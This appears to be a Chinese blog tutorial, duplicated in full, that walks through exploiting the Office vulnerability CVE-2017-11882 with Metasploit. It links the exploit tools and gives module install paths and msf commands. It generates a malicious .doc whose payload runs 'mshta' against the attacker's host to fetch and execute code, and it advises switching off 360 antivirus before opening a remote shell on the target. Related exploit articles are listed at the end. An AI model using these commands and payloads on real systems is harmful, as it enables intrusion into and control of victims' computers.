office漏洞 CVE-2017-11882 msf利用
2018-01-23 00:56
1026 查看
目标机:一台安装好office漏洞版本的电脑
攻击机:一台kai liunx ip:192.168.0.110
python脚本下载链接:https://github.com/Ridter/CVE-2017-11882
msf组件下载:https://github.com/0x09AL/CVE-2017-11882-metasploit
一.把上面下载的cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下
二.把下载的cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/
要是不放这个文件可能后面执行exploit时会出现运行失败
三.骚操作开始了,打开神器metasploit
四.使用命令search cve_2017_11882 查找对应的模块
五.使用命令use exploit/windows/smb/cve_2017_11882设置payload为反弹top
六.使用命令set lhost 192.168.0.110(攻击机的ip)
七.使用命令set URIPATH test设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)
八.检查配置,show options
九.运行,exploit -j
十.另外打开一个终端,把Command109b_CVE-2017-11882.py复制到kai liunx桌面,cd到桌面,运行命令python Command109b_CVE-2017-11882.py -c "mshta http://192.168.0.110:8080/test" -o test4.doc 生成恶意doc文件
注意要加上端口8080,加上上面设置的URI路径
十一.复制文件到目标机打开
360可能会杀掉最好关了
十二.返回攻击机kai liunx,看到鱼儿已经上钩了
十三.使用命令sessions -i进行查看
十四.输出命令sessions -i 1,切换进入
十五.现在我们成功的获取了目标机,输入shell,进入我们熟悉的cmd界面,并使用一下cmd命令。
感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!
攻击机:一台kai liunx ip:192.168.0.110
python脚本下载链接:https://github.com/Ridter/CVE-2017-11882
msf组件下载:https://github.com/0x09AL/CVE-2017-11882-metasploit
一.把上面下载的cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下
二.把下载的cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/
要是不放这个文件可能后面执行exploit时会出现运行失败
三.骚操作开始了,打开神器metasploit
四.使用命令search cve_2017_11882 查找对应的模块
五.使用命令use exploit/windows/smb/cve_2017_11882设置payload为反弹top
六.使用命令set lhost 192.168.0.110(攻击机的ip)
七.使用命令set URIPATH test设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)
八.检查配置,show options
九.运行,exploit -j
十.另外打开一个终端,把Command109b_CVE-2017-11882.py复制到kai liunx桌面,cd到桌面,运行命令python Command109b_CVE-2017-11882.py -c "mshta http://192.168.0.110:8080/test" -o test4.doc 生成恶意doc文件
注意要加上端口8080,加上上面设置的URI路径
十一.复制文件到目标机打开
360可能会杀掉最好关了
十二.返回攻击机kai liunx,看到鱼儿已经上钩了
十三.使用命令sessions -i进行查看
十四.输出命令sessions -i 1,切换进入
十五.现在我们成功的获取了目标机,输入shell,进入我们熟悉的cmd界面,并使用一下cmd命令。
感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!
相关文章推荐
- CVE-2017-11882漏洞利用
- CVE-2017-7269 IIS6.0利用MSF远程溢出漏洞提权
- 腾讯反病毒实验室预警:CVE-2017-11882漏洞最新利用方法
- Office隐藏17年的漏洞CVE_2017_11882测试记录
- 利用CVE-2017-11882漏洞利用的恶意样本分析
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用
- CVE-2017-11826漏洞利用样本分析
- CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用--自测
- OFFICE OLE2LINK(CVE-2017-0199)漏洞利用详解
- APT34利用CVE-2017-11882针对中东攻击样本分析
- Apache Tomcat远程命令执行漏洞(CVE-2017-12615) 漏洞利用到入侵检测
- GitHub现VMware虚拟机逃逸EXP,利用三月曝光的CVE-2017-4901漏洞
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- CVE-2017-3248——WebLogic反序列化漏洞利用工具
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- CVE-2017-8890漏洞分析与利用(Root Android 7.x)
- Microsoft Office内存损坏漏洞(CVE-2017-11882)实战
- CVE 2017-0199漏洞利用的新姿势
- vmware漏洞之三——Vmware虚拟机逃逸漏洞(CVE-2017-4901)Exploit代码分析与利用